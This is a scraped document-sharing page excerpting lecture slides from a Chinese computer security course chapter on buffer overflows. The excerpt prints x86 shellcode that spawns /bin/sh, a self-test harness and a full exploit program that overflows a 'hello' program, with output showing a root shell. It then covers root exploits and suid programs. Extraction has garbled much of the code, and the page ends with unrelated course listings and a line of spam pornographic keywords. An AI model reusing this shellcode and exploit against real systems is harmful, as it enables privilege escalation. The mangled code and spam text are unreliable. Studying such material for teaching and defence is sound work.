正文內(nèi)容

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章(編輯修改稿)

2025-03-19 12:32 本頁(yè)面

　

【文章內(nèi)容簡(jiǎn)介】 xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/ls。char large_string[128]。main(){ char buffer[96]。 int i。植入代碼自測(cè)試程序 (2) long* long_ptr = (long*)large_string。 for (i = 0。 i 32。 i++) long_ptr[i] = (long)buffer。 for (i = 0。 i strlen(shell_code)。 i++) large_string[i] = shell_code[i]。 strcpy(buffer, large_string)。 printf(Is everything OK? :)\n)。} 植入代碼自測(cè)試程序 (3)$ ./test1Is everything OK? :)hello test1 完整的攻擊 hello的程序 (1)include include include unsigned char shell_code[] = \xeb\x1f\x5e\x89\x76\x08\x31\xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/sh。define DEFAULT_OFFSET 0define BUFFER_SIZE 1024 完整的攻擊 hello的程序 (2)unsigned long get_esp(){ __asm__(movl %esp, %eax)。}main(int argc, char** argv){ char* buff。 char* ptr。 unsigned long* addr_ptr。 unsigned long esp。 int i, ofs。完整的攻擊 hello的程序 (3) if (argc == 1) ofs = DEFAULT_OFFSET。 else ofs = atoi(argv[1])。 ptr = buff = malloc(4096)。 /* Fill in with addresses */ addr_ptr = (unsigned long*)ptr。 esp = get_esp()。 printf(ESP = %08x\n, esp)。 for (i = 0。 i 100。 i++) *(addr_ptr++) = esp + ofs。完整的攻擊 hello的程序 (4) /* Fill the start of shell buffer with NOPs */ ptr = (char*)addr_ptr。 memset(ptr,39。A39。,BUFFER_SIZEstrlen(shell_code))。 ptr += BUFFER_SIZE strlen(shell_code)。 /* And then the shell code */ memcpy(ptr, shell_code, strlen(shell_code))。 ptr += strlen(shell_code)。 *ptr = 0。 printf(Is everything OK? :)\n)。 execl(./hello, hello, buff, NULL)。} 完整的攻擊 hello的程序 (5)tly:~/tttt/tt$ ./test2ESP = bffffcd0Is everything OK? :)Hello 一堆亂碼 /bin/shbash$ _ 得出的結(jié)論p一個(gè)程序當(dāng)沒(méi)有很好地檢查邊界條件時(shí)可能會(huì)受到緩沖區(qū)溢出攻擊p有緩沖區(qū)溢出漏洞的程序當(dāng)它能以特權(quán)用戶身份運(yùn)行時(shí)，可能讓普通用戶無(wú)需經(jīng)過(guò)認(rèn)證就可以獲得系統(tǒng)特權(quán) root exploitpRemote root exploit216。通過(guò)網(wǎng)絡(luò)，不需認(rèn)證即可獲得 root權(quán)限pLocal root exploit216。本地普通用戶，利用系統(tǒng)程序的漏洞獲得root權(quán)限哪些程序?qū)⒁蕴貦?quán)用戶身份運(yùn)行p網(wǎng)絡(luò)服務(wù)程序216。HTTP Server、 FTP Server、 Mail Server, etcpsyslogpTrojian木馬程序psuid/sgid程序 suid/sgid程序pUnix一項(xiàng)特殊技術(shù)，使普通用戶也能做只有超級(jí)用戶才能執(zhí)行的任務(wù)216。passwd、 at、 crontab、 pingp普通 rwx之上加上 s位， kernel在載入進(jìn)程映象時(shí)自動(dòng)將進(jìn)程有效用戶 /組標(biāo)識(shí)置為映象文件文件屬主 /組p例：216。ls l /usr/bin/passwd216。rsxx 1 root /usr/bin/passwd 還是攻擊 hello的例子tly:~/tttt/tt$ subash chown

點(diǎn)擊復(fù)制文檔內(nèi)容

教學(xué)課件相關(guān)推薦

現(xiàn)代物流技術(shù)與實(shí)務(wù)課件第十章-資料下載頁(yè)

【總結(jié)】第十章現(xiàn)代物流綜合管理技術(shù)本章內(nèi)容?第一節(jié)現(xiàn)代物流綜合管理技術(shù)概述?第二節(jié)物流系統(tǒng)規(guī)劃?第三節(jié)物流成本管理與控制技術(shù)?第四節(jié)物流標(biāo)準(zhǔn)化與質(zhì)量管理技術(shù)?第五節(jié)綠色物流技術(shù)本章學(xué)習(xí)目標(biāo)?清楚物流綜合管理技術(shù)的概念、目標(biāo)、原則和意義，掌握其內(nèi)容；?認(rèn)識(shí)物流系統(tǒng)所包含的要

2025-03-05 05:23

計(jì)算機(jī)網(wǎng)絡(luò)安全保密技術(shù)探索-資料下載頁(yè)

【總結(jié)】第一篇：計(jì)算機(jī)網(wǎng)絡(luò)安全保密技術(shù)探索計(jì)算機(jī)網(wǎng)絡(luò)安全保密技術(shù)探索摘要：計(jì)算機(jī)網(wǎng)絡(luò)自身存在著一定的開放性和自由性，而網(wǎng)絡(luò)協(xié)議在制定過(guò)程中無(wú)疑會(huì)滋生一些問(wèn)題和缺陷，這便使得網(wǎng)絡(luò)安全面臨著嚴(yán)峻的挑戰(zhàn)，而...

2024-11-16 23:18

[精選]第十章網(wǎng)絡(luò)安全-資料下載頁(yè)

【總結(jié)】第10章網(wǎng)絡(luò)安全第10章網(wǎng)絡(luò)安全1第10章網(wǎng)絡(luò)安全網(wǎng)絡(luò)安全問(wèn)題概述數(shù)據(jù)加密技術(shù)替代密碼與置換密碼數(shù)據(jù)加密標(biāo)準(zhǔn)DES2第10章網(wǎng)絡(luò)安全公開密鑰密碼體制公開密鑰密碼體制的特點(diǎn)RS

2025-02-08 11:11

第十章信息安全-資料下載頁(yè)

【總結(jié)】第十章信息安全目錄上一頁(yè)下一頁(yè)結(jié)束2020/11/17計(jì)算機(jī)文化基礎(chǔ)1第10章信息安全信息安全概述計(jì)算機(jī)病毒防火墻WindowsXP操作系統(tǒng)安全無(wú)線局域網(wǎng)安全電子商務(wù)和電子

2024-10-12 05:00

[精選]第十章數(shù)據(jù)的安全與管理-資料下載頁(yè)

【總結(jié)】第十章數(shù)據(jù)的安全與管理信息學(xué)院要點(diǎn)Access2023數(shù)據(jù)庫(kù)安全壓縮與修復(fù)數(shù)據(jù)庫(kù)數(shù)據(jù)庫(kù)打包、簽名和分發(fā)使用信任中心Access2023數(shù)據(jù)庫(kù)安全?Access2023數(shù)據(jù)庫(kù)安全的概述?創(chuàng)建數(shù)據(jù)庫(kù)訪問(wèn)密碼?為數(shù)據(jù)庫(kù)取消密碼保護(hù)?為數(shù)據(jù)庫(kù)修改密碼?用戶級(jí)安全

2025-02-07 00:29

[精選]第十章員工的安全與健康-資料下載頁(yè)

【總結(jié)】第十章：?jiǎn)T工的安全與健康?本章重點(diǎn)員工的安全與健康概述平橫工作與生活?學(xué)習(xí)目的自70年代初提出提高員工的安全與健康之后，許多國(guó)家的管理協(xié)會(huì)、勞工組織和政府有關(guān)部門很快做出了反應(yīng)，并針對(duì)各自情況采取了一些具體對(duì)策。

2025-01-08 09:04

[理學(xué)]第十章-網(wǎng)絡(luò)安全技術(shù)-資料下載頁(yè)

【總結(jié)】第10章網(wǎng)絡(luò)安全技術(shù)學(xué)習(xí)目標(biāo)了解網(wǎng)絡(luò)安全與安全威脅了解常規(guī)密鑰密碼體制與公開密鑰密碼體制掌握?qǐng)?bào)文鑒別技術(shù)掌握防火墻的概念與設(shè)計(jì)策略了解入侵檢測(cè)技術(shù)、網(wǎng)絡(luò)安全協(xié)議10.1網(wǎng)絡(luò)安全問(wèn)題概述1、網(wǎng)絡(luò)安全的概念?網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不會(huì)由于偶然或惡意的原因而遭

2025-01-03 23:55

計(jì)算機(jī)圖形學(xué)英文版課件第十章chapter-資料下載頁(yè)

【總結(jié)】ComputerEnglishChapter10ComputerandNetworkSecurityChapter10ComputerandNetworkSecurity計(jì)算機(jī)專業(yè)英語(yǔ)10-2Keypoints:usefultermsanddefinitionsofputersecurity

2024-10-18 20:14

mba教案第十章-資料下載頁(yè)

【總結(jié)】第十章通貨膨脹理論1第一節(jié)通貨膨脹的定義和影響?在媒體上，我們經(jīng)?？吹交蚵牭接嘘P(guān)物價(jià)變動(dòng)率、產(chǎn)出增長(zhǎng)率和失業(yè)率等有關(guān)報(bào)道。這說(shuō)明社會(huì)公眾普遍關(guān)心這些熱點(diǎn)問(wèn)題，因?yàn)檫@些問(wèn)題直接關(guān)系和影響到公眾的生活水平的變化。這一章我們就主要討論有關(guān)這方面的問(wèn)題。2通貨膨脹的定義所謂通貨膨脹是指一般物價(jià)水平的、相當(dāng)幅度的持

2025-03-05 15:48

第十章生育保險(xiǎn)-資料下載頁(yè)

【總結(jié)】第十章生育保險(xiǎn),,,生育保險(xiǎn)制度是針對(duì)女性勞動(dòng)者生育這一風(fēng)險(xiǎn)而設(shè)置的社會(huì)保險(xiǎn)項(xiàng)目。世界上大多數(shù)國(guó)家將生育保險(xiǎn)納入到醫(yī)療社會(huì)保險(xiǎn)范疇，也有一些國(guó)家單獨(dú)列為一個(gè)險(xiǎn)種。中國(guó)將生育社會(huì)保險(xiǎn)從醫(yī)療社會(huì)保險(xiǎn)中獨(dú)立...

2024-11-20 04:20

第十章保險(xiǎn)監(jiān)管-資料下載頁(yè)

【總結(jié)】第十章保險(xiǎn)監(jiān)管,第一節(jié)保險(xiǎn)監(jiān)管概述第二節(jié)保險(xiǎn)監(jiān)管的主體、客體和內(nèi)容第三節(jié)保險(xiǎn)監(jiān)管的模式、方式和手段,教學(xué)目的與要求,教學(xué)目的：掌握保險(xiǎn)監(jiān)管的含義與內(nèi)容，理解保險(xiǎn)監(jiān)管的原則，了解我國(guó)保險(xiǎn)監(jiān)管的進(jìn)展；熟悉...

2024-11-19 22:12

[精選]第十章促銷-資料下載頁(yè)

【總結(jié)】第十章促銷策略第一節(jié)促銷組合決策第二節(jié)廣告第三節(jié)銷售促進(jìn)第四節(jié)公共關(guān)系第五節(jié)人員推銷1第一節(jié)促銷組合決策?促銷（Promotion）――營(yíng)銷者將有關(guān)企業(yè)及產(chǎn)品（品牌）的信息通過(guò)各種方式傳遞給消費(fèi)者和用戶，促進(jìn)其了解、信

2025-01-20 12:26

第十章-保險(xiǎn)規(guī)劃-資料下載頁(yè)

【總結(jié)】第十章保險(xiǎn)規(guī)劃,第一節(jié)風(fēng)險(xiǎn)管理第二節(jié)保險(xiǎn)原理第三節(jié)保險(xiǎn)規(guī)劃與購(gòu)買決策,第一節(jié)風(fēng)險(xiǎn)管理,一、家庭面臨的主要風(fēng)險(xiǎn)二、明確家庭風(fēng)險(xiǎn)管理目標(biāo)三、選擇合適的風(fēng)險(xiǎn)管理技術(shù)四、家庭理財(cái)?shù)娘L(fēng)險(xiǎn)控制與監(jiān)測(cè),一、家庭面臨...

2024-11-19 22:12

8第十章稅收與效率-資料下載頁(yè)

【總結(jié)】第十章稅收與效率PublicFinance1?第一節(jié)稅收效應(yīng)?第二節(jié)稅收的超額負(fù)擔(dān)?第三節(jié)稅收效率分析2第一節(jié)稅收效應(yīng)政府征稅會(huì)產(chǎn)生兩種效應(yīng):收入效應(yīng)和替代效應(yīng)。一、稅收的收入效應(yīng)?收入效應(yīng)是指在相對(duì)價(jià)格不變的情況下，個(gè)人收入的變化對(duì)個(gè)人福利水平產(chǎn)生的影響。?

2025-01-14 10:08

第十章食品質(zhì)構(gòu)調(diào)整技術(shù)-資料下載頁(yè)

【總結(jié)】第十講食品質(zhì)構(gòu)調(diào)整技術(shù)技術(shù)蒸煮擠壓氣流膨化食品質(zhì)構(gòu)（texture）也稱為食品質(zhì)地，是指眼睛、口中的粘膜及肌肉所感覺(jué)到的食品的性質(zhì)，包括粗細(xì)、滑爽、顆粒感等。邯鄲職業(yè)技術(shù)學(xué)院食品質(zhì)構(gòu)是食品的一個(gè)重要屬性。作為一門相對(duì)獨(dú)立的科學(xué)技術(shù)，食品質(zhì)構(gòu)學(xué)起步較晚。目前，在我國(guó)食品科學(xué)與工程教學(xué)領(lǐng)域，其內(nèi)容與食品物性學(xué)、食品感官

2025-01-20 17:20

freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章(編輯修改稿)

現(xiàn)代物流技術(shù)與實(shí)務(wù)課件第十章-資料下載頁(yè)

計(jì)算機(jī)網(wǎng)絡(luò)安全保密技術(shù)探索-資料下載頁(yè)

[精選]第十章網(wǎng)絡(luò)安全-資料下載頁(yè)

第十章信息安全-資料下載頁(yè)

[精選]第十章數(shù)據(jù)的安全與管理-資料下載頁(yè)

[精選]第十章員工的安全與健康-資料下載頁(yè)

[理學(xué)]第十章-網(wǎng)絡(luò)安全技術(shù)-資料下載頁(yè)

計(jì)算機(jī)圖形學(xué)英文版課件第十章chapter-資料下載頁(yè)

mba教案第十章-資料下載頁(yè)

第十章生育保險(xiǎn)-資料下載頁(yè)

第十章保險(xiǎn)監(jiān)管-資料下載頁(yè)

[精選]第十章促銷-資料下載頁(yè)

第十章-保險(xiǎn)規(guī)劃-資料下載頁(yè)

8第十章稅收與效率-資料下載頁(yè)

第十章食品質(zhì)構(gòu)調(diào)整技術(shù)-資料下載頁(yè)

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章-wenkub

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章(已修改)

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章(編輯修改稿)

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章-wenkub.com

李鳳華--計(jì)算機(jī)安全與保密技術(shù)--第十章(已改無(wú)錯(cuò)字)